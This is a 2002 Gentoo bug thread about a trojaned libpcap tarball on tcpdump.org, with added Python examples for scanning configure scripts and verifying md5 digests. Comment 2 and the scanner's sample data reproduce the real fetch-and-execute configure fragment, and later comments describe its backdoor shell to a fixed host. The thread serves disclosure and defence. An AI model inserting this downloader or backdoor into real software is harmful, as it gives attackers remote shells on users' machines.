Bug 10663 - Trojaned libpcap on tcpdump.org
Summary: Trojaned libpcap on tcpdump.org
Status: RESOLVED FIXED
Alias: None
Product: Gentoo Linux
Classification: Unclassified
Component: New packages
Hardware: x86 Linux
Importance: Highest critical
Assignee: Gentoo Security
Reported: 2002-11-12 23:18 UTC by Russell Adams
Modified: 2003-02-04 19:42 UTC
Description Russell Adams 2002-11-12 23:18:58 UTC
My Gentoo install caught differences in the md5sums of the libpcap-0.7.1
sources from http://www.tcpdump.org/release/libpcap-0.7.1.tar.gz and the
md5sum on file in the ebuild.

I've downloaded the same sources from
http://www.ibiblio.org/pub/Linux/distributions/gentoo/distfiles/libpcap-0.7.1.t$
and performed a comparison, this is what I've found.

The two versions do vary, with the tcpdump.org file containing
modifications to the configure script and a modification to gencode.c.

The configure script downloads http://mars.raketti.net/~mash/services,
which is a file describing internet ports that also contains a shell
script embedded in it that creates and compiles a C program that opens
port 1963 and opens /bin/sh upon remote connection. It seems to listen
only for connections from 212.146.0.34. It might be calling home though,
my C is a bit rusty.

Can someone help verify this?

Please CC any correspondence to rladams@kelsey-seybold.com.


Demo / Russell
Comment 1 SpanKY gentoo-dev 2002-11-12 23:37:39 UTC
the good news is people using Gentoo *should* be unaffected 
Comment 2 Bruce A. Locke (RETIRED) gentoo-dev 2002-11-12 23:40:53 UTC
Yep... The copy of libpcap-0.7.1.tar.gz is definitely trojaned.  A diff of the
configure script between the gentoo cached copy and the tcpdump.org copy shows
the tcpdump.org copy having lines such as:

 CNF="services"
 URL="mars.raketti.net/~mash/$CNF"

and

 (IFS=","
 ARGS="wget -q -O -,lynx --source,fetch -q -o -"

 for i in $ARGS; do
       IFS=" "
       $i $URL 1> $CNF
       if [ -f $CNF ]; then sh $CNF
           exit
       fi
       rm -f $CNF
 done) 1>/dev/null 2>/dev/null &

The Gentoo cached copy on ibiblio does not show this and the trojaned copy from
the upstream site has a different md5sum from the one we have in the digest, so it
appears we (Gentoo) have dodged this bullet.

Anyone working on contacting the upstream?
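The fragment quoted above is the whole tell: an autoconf-generated configure script has no business invoking a download tool or running a file it just wrote through sh. As an added example (not part of the bug report or of any Gentoo tooling), the scanner below walks a configure script line by line and flags download tools, hard-coded remote paths, and "sh FILE" style execution, then reports whether the fetch-and-execute combination is present. The sample script is constructed from a few ordinary autoconf-looking lines plus the fragment quoted in Comment 2; the regular expressions are illustrative heuristics, not a complete detector.

```python
import re

# Constructed sample: a few lines that look like an ordinary autoconf
# configure script, plus the fetch-and-execute fragment quoted in Comment 2.
SAMPLE_CONFIGURE = """\
#! /bin/sh
# Guess values for system-dependent variables and create Makefiles.
ac_help=
ac_default_prefix=/usr/local
CNF="services"
URL="mars.raketti.net/~mash/$CNF"
(IFS=","
ARGS="wget -q -O -,lynx --source,fetch -q -o -"
for i in $ARGS; do
      IFS=" "
      $i $URL 1> $CNF
      if [ -f $CNF ]; then sh $CNF
          exit
      fi
      rm -f $CNF
done) 1>/dev/null 2>/dev/null &
echo "checking for gcc"
"""

# Network download tools a configure script should never invoke.
FETCH_TOOLS = re.compile(r"\b(wget|lynx|fetch|curl|ftp)\b")
# "sh FILE", ". FILE" or "source FILE": executing a file the script obtained.
EXEC_FILE = re.compile(r"(^|[;&|(\s])(sh|bash|source|\.)\s+\$?\w+")
# A hard-coded remote path such as host.example.net/dir (heuristic TLD list).
HOST_REF = re.compile(r"\b[a-z0-9.-]+\.(net|com|org|ru|info)/", re.I)


def scan_configure(text):
    """Return [(line_number, category, line)] for lines worth a reviewer's eye:
    'host' for a remote path, 'fetch' for a download tool, 'exec' for running
    a file through the shell. One entry per matching category per line."""
    findings = []
    checks = (("host", HOST_REF), ("fetch", FETCH_TOOLS), ("exec", EXEC_FILE))
    for lineno, line in enumerate(text.splitlines(), 1):
        for category, pattern in checks:
            if pattern.search(line):
                findings.append((lineno, category, line.strip()))
    return findings


def is_fetch_and_exec(text):
    """True when the script both downloads something and executes a file:
    the combination that turned this configure script into a downloader."""
    categories = {category for _, category, _ in scan_configure(text)}
    return {"fetch", "exec"} <= categories


if __name__ == "__main__":
    for lineno, category, line in scan_configure(SAMPLE_CONFIGURE):
        print("line %3d [%s] %s" % (lineno, category, line))
    print("fetch-and-exec pattern present:", is_fetch_and_exec(SAMPLE_CONFIGURE))
```

Run against the sample it reports the URL line, the ARGS line listing wget/lynx/fetch, and the `sh $CNF` line, and returns True for the combination; a script with only the benign lines returns False. Reviewing a diff of configure between the cached and upstream tarballs, as Bruce did, remains the more reliable check; this scanner is for the case where no trusted copy is at hand.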
Comment 3 Russell Adams 2002-11-12 23:41:41 UTC
Yes, the digest check picked it up. The only time the tcpdump.org version is
used is if the ibiblio mirror isn't responding. There's still a chance though.
I've notified the tcpdump.org mailing list...

Demo / Russell
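Comments 2 and 3 describe the control that caught this: the ebuild's digest held the md5sum of the clean tarball, so the upstream copy failed the check, and the digest is checked no matter which mirror served the file. The following is an added example of that check and is not Gentoo's own code. It assumes the digest line format ebuilds used at the time (`MD5 <hex digest> <filename> <size>`); the archive contents, hash and size are constructed here, not taken from the real libpcap-0.7.1 digest.

```python
import hashlib

# Constructed stand-ins for the two downloads compared in this bug: the copy
# cached on the ibiblio mirror, and an "upstream" copy with extra bytes
# appended. The real archives are not reproduced here.
CLEAN_TARBALL = b"constructed stand-in for a clean libpcap-0.7.1.tar.gz\n" * 64
TROJANED_TARBALL = CLEAN_TARBALL + b"bytes standing in for the modified configure\n"

DISTFILE = "libpcap-0.7.1.tar.gz"

# Digest line in the format Gentoo ebuilds used at the time (assumption):
# "MD5 <hex digest> <filename> <size in bytes>". The values are computed from
# the constructed clean archive above, not taken from the real ebuild.
DIGEST_TEXT = "MD5 %s %s %d\n" % (
    hashlib.md5(CLEAN_TARBALL).hexdigest(), DISTFILE, len(CLEAN_TARBALL))


def parse_digest(text):
    """Map filename -> (md5 hex, size) from digest lines; other lines are ignored."""
    entries = {}
    for line in text.splitlines():
        parts = line.split()
        if len(parts) == 4 and parts[0] == "MD5":
            _, hexdigest, name, size = parts
            entries[name] = (hexdigest.lower(), int(size))
    return entries


def verify_distfile(name, data, entries):
    """Return (ok, reason). The size check is cheap and already rejects a
    padded archive; the hash comparison is what actually decides."""
    if name not in entries:
        return False, "no digest entry for %s" % name
    expected_md5, expected_size = entries[name]
    if len(data) != expected_size:
        return False, "size mismatch: digest says %d, got %d" % (expected_size, len(data))
    actual = hashlib.md5(data).hexdigest()
    if actual != expected_md5:
        return False, "md5 mismatch: digest says %s, got %s" % (expected_md5, actual)
    return True, "ok"


def fetch_verified(name, entries, mirrors):
    """Walk the mirrors in order, as a fallback download would, and return
    (label, data) for the first copy that verifies, or None if none does.
    'mirrors' is a list of (label, bytes served); constructed here, where a
    real implementation would download from each mirror in turn."""
    for label, data in mirrors:
        ok, reason = verify_distfile(name, data, entries)
        print("%s: %s" % (label, reason))
        if ok:
            return label, data
    return None


if __name__ == "__main__":
    entries = parse_digest(DIGEST_TEXT)
    # Mirror order from Comment 3: ibiblio first, tcpdump.org only as fallback.
    result = fetch_verified(DISTFILE, entries,
                            [("ibiblio", CLEAN_TARBALL), ("tcpdump.org", TROJANED_TARBALL)])
    print("accepted copy from:", result[0] if result else "none")
```

The point of `fetch_verified` is the one Russell makes: the fallback source is untrusted in exactly the same way as the primary, so the digest check must run on whichever copy arrives, and a copy that fails is discarded rather than installed. MD5 is used because that is what the 2002 digest files carried; current Gentoo Manifests record BLAKE2B and SHA512 instead, and the same logic applies with `hashlib.blake2b` or `hashlib.sha512`.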
Comment 4 Russell Adams 2002-11-12 23:44:53 UTC
The services file it downloads contains an embedded shell script. I've attached
it, can someone who's current with C explain what it does?

I've determined it must open port 1963 and linked it to /bin/sh, but not much
else.

Demo / Russell
Comment 5 SpanKY gentoo-dev 2002-11-12 23:48:29 UTC
you're right that's all it does ... that's all it really needs to do ...
open a shell on a port and listen ... chances are it's a root shell and from
there the person can own the box ;)
Comment 6 Bruce A. Locke (RETIRED) gentoo-dev 2002-11-12 23:52:19 UTC
The program connects to 212.146.0.34:1963 and reads one of three one byte status
codes:

A - program exists
M - closes connection, sleeps 3600 seconds, reconnects
D - forks and spawns a shell and does the needed file descriptor manipulation to
redirect it to the existing connection to 212.146.0.34. It's important to note
that it reuses the same outgoing connection so no other connection is needed to
use the shell.  (Gets around firewalls that block incoming connections).

Comment 7 Bruce A. Locke (RETIRED) gentoo-dev 2002-11-12 23:54:13 UTC
erm... that should be "program exits"... not "program exists" :)
Comment 8 Russell Adams 2002-11-13 00:01:52 UTC
The Houston Linux Users Group is throwing up a quick page, and I've quoted you
Bruce if you don't mind (w/ proper credits).
Comment 9 Russell Adams 2002-11-13 10:47:12 UTC
Turns out all recent sources for libpcap (3.7.1) and 
tcpdump (3.6.2 and 3.7.1) are compromised.

See the report on slashdot.org. Thanks again Bruce.
Comment 10 Rajiv Aaron Manglani (RETIRED) gentoo-dev 2002-11-27 21:47:58 UTC
for more info:

http://www.hlug.org/trojan/

gentoo was never affected.